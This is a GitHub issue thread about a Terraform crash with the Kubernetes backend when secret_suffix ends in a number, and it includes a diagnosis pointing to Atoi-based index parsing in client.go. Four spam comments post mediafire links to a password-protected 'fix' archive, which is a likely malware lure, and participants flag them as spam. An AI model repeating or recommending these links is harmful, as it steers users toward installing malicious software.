### ISSUE TITLE
Terraform Crash

### ISSUE THREAD

**Issue by Bibz87** [hashicorp/terraform#35641]
### Terraform Version

```shell
Terraform v1.9.5
on windows_amd64
+ provider registry.terraform.io/hashicorp/random v3.6.2
```

### Terraform Configuration Files

```terraform
terraform {
  backend "kubernetes" {
    config_path="~/.kube/config"
    namespace="terraform-tests"
    secret_suffix="test-01"
  }
}

resource "random_string" "test" {
  length = 8
  special = false
}
```

### Debug Output

https://gist.github.com/Bibz87/2c68fea5383e932e99451051d1bc10d9

### Expected Behavior

Terraform doesn't crash during initialisation

### Actual Behavior

Attempting to initialise Terraform configuration results in crash

### Steps to Reproduce

1. `terraform init`

### Additional Context

After some testing, it looks like ending the secret suffix with a number causes the crash. Changing `secret_suffix` from `test-01` to `test` makes the initialisation work properly without crashing.

Note: Terraform does create the Kubernetes secret before crashing.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Bibz87** [comment]
I definitely don't feel comfortable downloading and installing random patches from untrusted sources.

**Comment by crw** [comment]
Looks like spam. Will report to GitHub.

**Comment by crw** [comment]
@Bibz87 Thanks for your report!

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bschaatsbergen** [comment]
The issue appears in the [client.go](https://github.com/hashicorp/terraform/blob/main/internal/backend/remote-state/kubernetes/client.go#L105). If the secret_suffix is set to "test-01", the retrieved secret might be named `tfstate-default-test-01`. The code uses [Atoi](https://pkg.go.dev/strconv#Atoi) to parse the last segment of the name, assuming it could be an integer index. This approach incorrectly interprets "test-44" as an index 44, which leads to attempts to access a non-existent 44th element. The assumption that the last part of the name is an index is confusing.
